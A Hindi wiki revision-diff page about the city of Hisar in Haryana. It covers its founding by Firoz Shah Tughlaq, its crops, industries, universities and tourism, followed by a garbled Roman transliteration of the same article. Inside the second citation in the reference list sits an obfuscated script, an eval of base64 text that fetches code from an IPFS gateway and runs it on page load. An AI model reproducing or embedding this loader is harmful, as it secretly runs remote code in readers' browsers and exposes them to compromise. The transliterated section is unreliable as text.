Difference between revisions of "हिसार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(18 intermediate revisions by 5 users not shown)
Line 1: Line 1:
हिसार शहर, पश्चिमोत्तर [[हरियाणा]] राज्य, पश्चिमोत्तर [[भारत]], में पश्चिमी यमुना नहर की हांसी शाखा पर स्थित है।  
+
[[चित्र:Hisar-Complex.jpg|thumb|250px|हिसार दुर्ग, [[हरियाणा]]]]
 +
'''हिसार''' एक शहर, जो पश्चिमोत्तर [[हरियाणा|हरियाणा राज्य]], पश्चिमोत्तर [[भारत]] में पश्चिमी यमुना नहर की हांसी शाखा पर स्थित है। इसकी स्थापना [[तुग़लक़ वंश|तुग़लक़]] शासक [[फ़िरोज़ शाह तुग़लक़]] ने की थी। प्राचीन समय में यहाँ कई आदिवासी जातियाँ रहा करती थीं। हिसार हरियाणा राज्य के पर्यटन के लिए एक आकर्षक स्‍थल है। पर्यटक यहाँ पर कई ख़ूबसूरत स्थलों की सैर कर सकते हैं। यहाँ [[कपास]], अनाज और तेल के बीजों का बड़ा बाज़ार है। इस बाज़ार के लिए यह बहुत प्रसिद्ध है।
 +
{{tocright}}
 
==इतिहास==
 
==इतिहास==
तुग़लक वंश के शासक बादशाह [[फ़िरोज़ शाह तुग़लक]] ने सन 1356 ई. में एक दुर्ग के रूप में हिसार की स्थापना की थी। यह शहर बाद में एक महत्त्वपूर्ण केंद्र बन गया। 18वीं शताब्दी में जनशून्य किए गए इस शहर पर बाद में ब्रिटिश अभियानकर्ता जॉर्ज थॉमस ने क़ब्ज़ा कर लिया। 1867 में हिसार की नगरपालिका का अध्ययन किया गया। यह शहर एक दीवार से घिरा है। जिसमें चार दरवाज़े हैं- नागोरी गेट, मोरी गेट, दिल्ली गेट तथा तलाकी गेट के नाम से प्रसिद्ध है। यहाँ फ़िरोज़ शाह के क़िले व महल के अवशेषों के साथ-साथ कई प्राचीन मस्जिदें हैं, जिनमें जहाज़ भी एक है, जो अब एक जैन मंदिर है।
+
इस नगर को [[फ़िरोज़ शाह तुग़लक़]] (राज्यभिषेक 1351 ई.) ने बसाया था। कहा जाता है कि हिसार के पास के वनों में फ़िरोज़ आखेट के लिए रोजाना जाया करता था और उसने यहां एक [[दुर्ग]] (हिसार दुर्ग) बनवाया था, जहां कालांतर में आबादी हो गई। हिसार के पास 'अग्राहा' नामक स्थान है, जो प्राचीन 'अग्रोदक' कहा जाता है। यह नगर [[महाभारत]] कालीन माना जाता है। [[अलक्षेंद्र]] के आक्रमण के समय (327 ई. पू.) इस स्थान पर 'आग्रेयगण' का राज्य था। [[वासुदेव शरण अग्रवाल]] का विचार है कि [[पाणिनि]]<ref> 4, 2, 54</ref> में उल्लिखित 'एषुकारिभक्त' हिसार का ही प्राचीन नाम है। इसे [[कुरु जनपद|कुरू प्रदेश]] का एक बड़ा नगर कहा गया है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=1026|url=}}</ref>
 +
 
 +
18वीं [[शताब्दी]] में जनशून्य किए गए इस शहर पर बाद में ब्रिटिश अभियानकर्ता जॉर्ज थॉमस ने क़ब्ज़ा कर लिया। [[1867]] में हिसार की नगरपालिका का अध्ययन किया गया। यह शहर एक दीवार से घिरा है, जिसमें चार दरवाज़े हैं- 'नागोरी गेट', 'मोरी गेट', 'दिल्ली गेट' तथा 'तलाकी गेट' के नाम से प्रसिद्ध है। यहाँ फ़िरोज़ शाह के क़िले व महल के [[अवशेष|अवशेषों]] के साथ-साथ कई प्राचीन मस्जिदें हैं, जिनमें जहाज़ भी एक है, जो अब एक जैन मंदिर है। प्राचीन समय में यह [[हड़प्पा सभ्यता]] का मुख्य केन्द्र था। प्राचीन समय में यहाँ कई आदिवासी जातियाँ रहती थी। इन जातियों में भरत, पुरू, मुजावत्स और महावृष प्रमुख थी।
 
==कृषि और खनिज==
 
==कृषि और खनिज==
गेहूँ व कपास यहाँ की प्रमुख फ़सलें हैं। अन्य फ़सलों में चना, बाजरा, चावल, सरसों व गन्ना शामिल हैं।  
+
गेहूँ व कपास यहाँ की प्रमुख फ़सलें हैं। अन्य फ़सलों में चना, बाजरा, [[चावल]], सरसों व [[गन्ना]] शामिल हैं।  
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
उद्योगों में कपास की ओटाई, हथकरघा बुनाई और कृषि यंत्रों व सिलाई मशीनों के निर्माण से जुड़े उद्योग शामिल हैं।
+
उद्योगों में [[कपास]] की ओटाई, हथकरघा बुनाई और [[कृषि]] यंत्रों व सिलाई मशीनों के निर्माण से जुड़े उद्योग शामिल हैं। यहाँ पर कपास, अनाज और तेल के बीजों का बड़ा बाज़ार है। इस बाज़ार के लिए यह बहुत प्रसिद्ध है।
 +
 
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
 
हिसार शहर एक प्रमुख रेल व सड़क जंक्शन है।   
 
हिसार शहर एक प्रमुख रेल व सड़क जंक्शन है।   
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
इस शहर में सी.सी. शाहू हरियाणा कृषि विश्वविद्यालय, गुरु जंभेश्वर विश्वविद्यालय, सी.सी. शाहू प्रबंधन महाविद्यालय, कृषि इंजीनियरिंग व प्रौद्योगिकी महाविद्यालय और हिसार गवर्नमेंट कॉलेज व डी.एन. कॉलेज सहित कई महाविद्यालय शामिल हैं।  
 
इस शहर में सी.सी. शाहू हरियाणा कृषि विश्वविद्यालय, गुरु जंभेश्वर विश्वविद्यालय, सी.सी. शाहू प्रबंधन महाविद्यालय, कृषि इंजीनियरिंग व प्रौद्योगिकी महाविद्यालय और हिसार गवर्नमेंट कॉलेज व डी.एन. कॉलेज सहित कई महाविद्यालय शामिल हैं।  
 +
==पर्यटन==
 +
{{main|हिसार पर्यटन}}
 +
[[हरियाणा]] में स्थित हिसार एक ख़ूबसूरत स्थान है और हिसार पर्यटन का आकर्षक स्‍थल है। पर्यटक यहाँ पर कई ख़ूबसूरत स्थलों की [[सैर]] कर सकते हैं। यहाँ पर सम्राट [[अशोक]] के काल का एक स्तम्भ, [[कुषाण वंश]] के सिक्के व अन्य अवशेष भी मिले हैं। कुल मिलाकर हिसार बहुत ख़ूबसूरत है और पर्यटक यहाँ पर अनेक ख़ूबसूरत स्‍थान देख सकते हैं। पर्यटक स्थलों की सैर के बाद यहाँ पर अनेक ऐतिहासिक इमारतों की यात्रा की जा सकती है।
 +
 
==जनसंख्या==
 
==जनसंख्या==
 
2001 की जनगणना के अनुसार इस शहर की जनसंख्या 2,56,810, ज़िले की कुल जनसंख्या 15,36,417 है।
 
2001 की जनगणना के अनुसार इस शहर की जनसंख्या 2,56,810, ज़िले की कुल जनसंख्या 15,36,417 है।
{{लेख प्रगति
+
 
|आधार=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|प्रारम्भिक=प्रारम्भिक1
+
==टीका टिप्पणी और संदर्भ==
|माध्यमिक=
+
<references/>
|पूर्णता=
+
==संबंधित लेख==
|शोध=
+
{{हरियाणा के पर्यटन स्थल}}{{हरियाणा के नगर}}
}}
+
[[Category:हरियाणा]][[Category:हरियाणा_के_ऐतिहासिक_नगर]][[Category:हरियाणा_के_नगर]][[Category: भारत_के_नगर]][[Category:हरियाणा_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:ऐतिहासिक स्थान कोश]][[Category:इतिहास कोश]]
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 10:07, 15 August 2014

[[chitr:Hisar-Complex.jpg|thumb|250px|hisar durg, hariyana]] hisar ek shahar, jo pashchimottar hariyana rajy, pashchimottar bharat mean pashchimi yamuna nahar ki haansi shakha par sthit hai. isaki sthapana tugalaq shasak firoz shah tugalaq ne ki thi. prachin samay mean yahaan kee adivasi jatiyaan raha karati thian. hisar hariyana rajy ke paryatan ke lie ek akarshak sh‍thal hai. paryatak yahaan par kee khoobasoorat sthaloan ki sair kar sakate haian. yahaan kapas, anaj aur tel ke bijoan ka b da bazar hai. is bazar ke lie yah bahut prasiddh hai.

itihas

is nagar ko firoz shah tugalaq (rajyabhishek 1351 ee.) ne basaya tha. kaha jata hai ki hisar ke pas ke vanoan mean firoz akhet ke lie rojana jaya karata tha aur usane yahaan ek durg (hisar durg) banavaya tha, jahaan kalaantar mean abadi ho gee. hisar ke pas 'agraha' namak sthan hai, jo prachin 'agrodak' kaha jata hai. yah nagar mahabharat kalin mana jata hai. alaksheandr ke akraman ke samay (327 ee. poo.) is sthan par 'agreyagan' ka rajy tha. vasudev sharan agraval ka vichar hai ki panini[1] mean ullikhit 'eshukaribhakt' hisar ka hi prachin nam hai. ise kuroo pradesh ka ek b da nagar kaha gaya hai.[2]

18vian shatabdi mean janashoony kie ge is shahar par bad mean british abhiyanakarta j aaurj th aaumas ne qabza kar liya. 1867 mean hisar ki nagarapalika ka adhyayan kiya gaya. yah shahar ek divar se ghira hai, jisamean char daravaze haian- 'nagori get', 'mori get', 'dilli get' tatha 'talaki get' ke nam se prasiddh hai. yahaan firoz shah ke qile v mahal ke avasheshoan ke sath-sath kee prachin masjidean haian, jinamean jahaz bhi ek hai, jo ab ek jain mandir hai. prachin samay mean yah h dappa sabhyata ka mukhy kendr tha. prachin samay mean yahaan kee adivasi jatiyaan rahati thi. in jatiyoan mean bharat, puroo, mujavats aur mahavrish pramukh thi.

krishi aur khanij

gehooan v kapas yahaan ki pramukh fasalean haian. any fasaloan mean chana, bajara, chaval, sarasoan v ganna shamil haian.

udyog aur vyapar

udyogoan mean kapas ki otaee, hathakaragha bunaee aur krishi yantroan v silaee mashinoan ke nirman se ju de udyog shamil haian. yahaan par kapas, anaj aur tel ke bijoan ka b da bazar hai. is bazar ke lie yah bahut prasiddh hai.

yatayat aur parivahan

hisar shahar ek pramukh rel v s dak jankshan hai.

shikshan sansthan

is shahar mean si.si. shahoo hariyana krishi vishvavidyalay, guru janbheshvar vishvavidyalay, si.si. shahoo prabandhan mahavidyalay, krishi ianjiniyariang v praudyogiki mahavidyalay aur hisar gavarnameant k aaulej v di.en. k aaulej sahit kee mahavidyalay shamil haian.

paryatan

  1. REDIRECTsaancha:mukhy

hariyana mean sthit hisar ek khoobasoorat sthan hai aur hisar paryatan ka akarshak sh‍thal hai. paryatak yahaan par kee khoobasoorat sthaloan ki sair kar sakate haian. yahaan par samrat ashok ke kal ka ek stambh, kushan vansh ke sikke v any avashesh bhi mile haian. kul milakar hisar bahut khoobasoorat hai aur paryatak yahaan par anek khoobasoorat sh‍than dekh sakate haian. paryatak sthaloan ki sair ke bad yahaan par anek aitihasik imaratoan ki yatra ki ja sakati hai.

janasankhya

2001 ki janaganana ke anusar is shahar ki janasankhya 2,56,810, zile ki kul janasankhya 15,36,417 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 4, 2, 54
  2. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 1026 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh